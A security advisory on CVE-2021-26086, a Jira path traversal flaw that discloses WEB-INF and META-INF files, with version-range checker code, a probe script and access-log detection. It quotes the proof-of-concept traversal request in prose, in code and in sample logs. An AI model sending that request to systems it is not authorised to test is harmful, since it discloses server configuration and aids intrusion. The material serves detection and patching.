Category: Vulnerability Intelligence
Vulnerability Class: Path Traversal and Read File Vulnerability
CVE ID: CVE-2021-26086
CVSS:3.0 Score: 5.3
CVSS Severity: Medium
TLP: GREEN
Reference: https://en.wikipedia.org/wiki/Traffic_Light_Protocol
Executive Summary
- Atlassian released an advisory [ 1 ] for a newly identified path traversal and file read vulnerability, CVE-2021-26086, in Jira Software Server and Data Center.
- Jira Software is a proprietary issue-tracking product developed by Atlassian for bug tracking and agile project management.
- The vulnerability is being actively exploited in the wild and affects multiple release lines of the software.
- Atlassian has released fixes for CVE-2021-26086 in Jira versions 8.5.14, 8.13.6, 8.16.1 and 8.17.0.
- On its own the flaw only discloses files: the 5.3 score reflects a confidentiality impact with no integrity or availability impact. Threat actors could use the disclosed configuration and version details to exfiltrate sensitive information and to chain further attacks, up to remote code execution through techniques such as log poisoning when a second, write- or execute-capable flaw is present.
Analysis
- Atlassian Jira is one of the most widely used ticketing tools in organizations around the world. CVE-2021-26086 is present in the following versions of Atlassian Jira Server and Data Center:
- All versions before 8.5.14
- All versions from 8.6.0 before 8.13.6
- All versions from 8.14.0 before 8.16.1
- The vulnerability allows an unauthenticated remote attacker to read files under the /WEB-INF/ and /META-INF/ directories of the Jira web application via path traversal.
- Exploitation is trivial: a single unauthenticated GET request with a crafted path is enough to make the server return the requested file (this is file disclosure, not file inclusion; nothing is executed).
- Successful exploitation discloses the web application's descriptors and configuration files, for example WEB-INF/web.xml and the Maven pom.properties under META-INF, which also reveals the exact installed Jira version. [ 2 ]
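The three affected ranges above are easy to misread (8.5.14 and 8.5.15 are fixed even though 8.6.0 is not), so the following added example, which is not part of the advisory or Atlassian's own tooling, encodes them as half-open version intervals and also pulls the version out of a Maven pom.properties body, since that is exactly the file the published PoC retrieves. The SAMPLE_POM_PROPERTIES text is constructed for illustration.

```python
"""Added example: decide whether a Jira Server / Data Center build falls in the
CVE-2021-26086 affected ranges listed in the advisory (not Atlassian's code)."""

import re

# Affected ranges as [lower, upper) half-open intervals of (major, minor, patch):
# <8.5.14 ; 8.6.0 <= v < 8.13.6 ; 8.14.0 <= v < 8.16.1.
# Everything else, including the fixed 8.5.14, 8.13.6, 8.16.1 and 8.17.0,
# is not affected.
AFFECTED_RANGES = (
    ((0, 0, 0), (8, 5, 14)),
    ((8, 6, 0), (8, 13, 6)),
    ((8, 14, 0), (8, 16, 1)),
)


def parse_version(text):
    """Turn '8.13.5', '8.13' or '8.13.5-m0001' into a (major, minor, patch) tuple.
    Missing components count as 0; anything that does not start with a dotted
    number raises ValueError instead of silently comparing wrong."""
    m = re.match(r"\s*(\d+)(?:\.(\d+))?(?:\.(\d+))?", text)
    if not m:
        raise ValueError("not a version string: %r" % text)
    return tuple(int(g) if g is not None else 0 for g in m.groups())


def is_affected(version):
    """True when the version lies inside any of the affected ranges."""
    v = parse_version(version)
    return any(lo <= v < hi for lo, hi in AFFECTED_RANGES)


def version_from_pom_properties(body):
    """Extract the 'version=' value from a Maven pom.properties body, i.e. the
    file returned by the PoC request. Returns None if no version line exists."""
    for line in body.splitlines():
        line = line.strip()
        if line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        if key.strip() == "version":
            return value.strip()
    return None


# Constructed sample of what a vulnerable 8.13.x instance would return for
# /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
SAMPLE_POM_PROPERTIES = """#Generated by Maven
#Tue Jun 01 10:00:00 UTC 2021
version=8.13.5
groupId=com.atlassian.jira
artifactId=jira-webapp-dist
"""

if __name__ == "__main__":
    for v in ("8.5.13", "8.5.14", "8.13.5", "8.13.6", "8.16.0", "8.16.1", "8.17.0"):
        print(v, "affected" if is_affected(v) else "not affected")
    leaked = version_from_pom_properties(SAMPLE_POM_PROPERTIES)
    print("leaked version", leaked, "affected" if is_affected(leaked) else "not affected")
```

Feed `is_affected` the version string from the admin UI, an inventory export, or the leaked pom.properties; a patched 8.5.x or 8.13.x instance correctly reports as not affected even though it is numerically below 8.17.0.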
Proof of Concept (POC)
The Proof of Concept (POC) [ 3 ] for this vulnerability sends a single unauthenticated GET request that uses Jira's static-resource prefix /s/ followed by a ';' path segment to reach the /META-INF/ directory and retrieve the Maven build properties of the Jira web application:
GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1
A vulnerable instance answers with the contents of pom.properties, which include the installed Jira version; a patched instance does not return the file. The execution of this request and the endpoint used are shown in the screenshot below.
[Figure: Screenshot of the Proof of Concept]
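For teams that need to confirm exposure and hunt for prior attempts, the following added example (not the PacketStorm PoC and not part of the original page) does two things: it sends the same GET request as the PoC and only reports "vulnerable" when the body actually contains the Maven coordinates of jira-webapp-dist, and it scans access-log lines for any request that reaches WEB-INF or META-INF after URL-decoding. The base URL, the Combined Log Format regex and the SAMPLE_ACCESS_LOG lines are assumptions constructed for illustration; adapt LOG_RE to your own Tomcat access-log pattern.

```python
"""Added example: probe a Jira instance you are authorised to test for
CVE-2021-26086 and flag exploitation attempts in an access log.
Not Atlassian's or PacketStorm's code."""

import re
import urllib.error
import urllib.parse
import urllib.request

# Same path as the published PoC. '/s/<anything>/_/' is Jira's static-resource
# prefix; the ';' path-parameter segment is what lets the lookup escape into
# META-INF (the same trick reaches WEB-INF, e.g. ;/WEB-INF/web.xml).
POC_PATH = "/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties"

# Markers only the real jira-webapp-dist pom.properties carries; checking for
# them avoids a false positive from a 200 that is really a login page.
POM_MARKERS = ("groupId=com.atlassian.jira", "artifactId=jira-webapp-dist")


def looks_vulnerable(status, body):
    """A 200 whose body contains the Maven coordinates means the file was served."""
    return status == 200 and all(marker in body for marker in POM_MARKERS)


def probe(base_url, timeout=10):
    """Send the PoC GET to base_url (network I/O; only against systems you are
    authorised to test) and return (status, body)."""
    req = urllib.request.Request(
        base_url.rstrip("/") + POC_PATH,
        headers={"User-Agent": "cve-2021-26086-check"},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


# --- detection side ---------------------------------------------------------

# Combined Log Format (assumption: adjust to your Tomcat AccessLogValve pattern).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Directories a servlet container must never serve; a request that reaches them
# after decoding is an exploitation attempt whatever prefix it used.
PROTECTED_DIRS = ("web-inf/", "meta-inf/")


def is_traversal_attempt(raw_path):
    """True when the path, after URL-decoding twice (to catch %3B and %252F
    style encodings) and case-folding, reaches into WEB-INF or META-INF."""
    decoded = urllib.parse.unquote(urllib.parse.unquote(raw_path)).lower()
    return any(d in decoded for d in PROTECTED_DIRS)


def find_attempts(log_text):
    """Return (ip, path, status) for every access-log line that attempts the
    traversal; a 200 status means the attempt most likely succeeded."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_traversal_attempt(m.group("path")):
            hits.append((m.group("ip"), m.group("path"), int(m.group("status"))))
    return hits


# Constructed sample log: two exploitation attempts (one URL-encoded) from one
# source, plus one legitimate static-resource request that must not match.
SAMPLE_ACCESS_LOG = "\n".join([
    '203.0.113.7 - - [09/Aug/2021:13:37:01 +0000] "GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 200 132 "-" "curl/7.68.0"',
    '203.0.113.7 - - [09/Aug/2021:13:37:02 +0000] "GET /s/cfx/_/%3B/WEB-INF/web.xml HTTP/1.1" 200 5120 "-" "curl/7.68.0"',
    '198.51.100.20 - - [09/Aug/2021:13:38:00 +0000] "GET /s/d41d8cd/_/download/resources/jira.webresources:global-static/jira.css HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
])

if __name__ == "__main__":
    for ip, path, status in find_attempts(SAMPLE_ACCESS_LOG):
        print("traversal attempt from %s -> %s (HTTP %d)" % (ip, path, status))
    # Live check against an instance you own (assumed URL):
    # print(looks_vulnerable(*probe("https://jira.example.internal")))
```

The detection deliberately matches on the decoded target directory rather than on the exact PoC string, so variants that change the /s/ prefix, the placeholder segment, or the encoding of ';' and '/' are still caught; a 200 on such a line is the signal to treat the instance as compromised-by-disclosure and rotate anything the leaked files reveal.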
Impact & Mitigation
Impact
- An unauthenticated remote attacker can read files under the META-INF and WEB-INF directories of the Jira web application, which hold its deployment descriptors, configuration and build metadata (for example WEB-INF/web.xml and the Maven pom.properties under META-INF).
- The disclosed files reveal the exact Jira version and deployment details, which an attacker can use to fingerprint the instance, chain further attacks and expand the attack surface.
- On its own CVE-2021-26086 is read-only: it cannot write to server logs or execute code. Chained with an additional flaw that includes or executes attacker-controlled content, the disclosed information could contribute to a remote code execution (RCE) attack, for example through log poisoning.
- RCE would allow attackers to take control of the target system and even deploy ransomware on it.
- Initial access to a corporate endpoint may enable lateral movement across the internal network.
- Nation-state actors leverage such vulnerabilities to compromise information, while ransomware groups use them to extort money by encrypting data.
Mitigation
- Immediately update Jira Software to one of the following fixed versions (or any later release):
- 8.5.14
- 8.13.6
- 8.16.1
- 8.17.0
- After patching, re-send the PoC request; a fixed instance no longer returns pom.properties.
- Review access logs for requests whose path reaches WEB-INF or META-INF (including URL-encoded variants of ';' and '/') to identify earlier exploitation attempts, and treat a 200 response to such a request as a disclosure of the affected files.
References
[ 1 ] JIRA SERVER Advisory
[ 2 ] Important Directories and Files - Jira Server
[ 3 ] POC by PacketStorm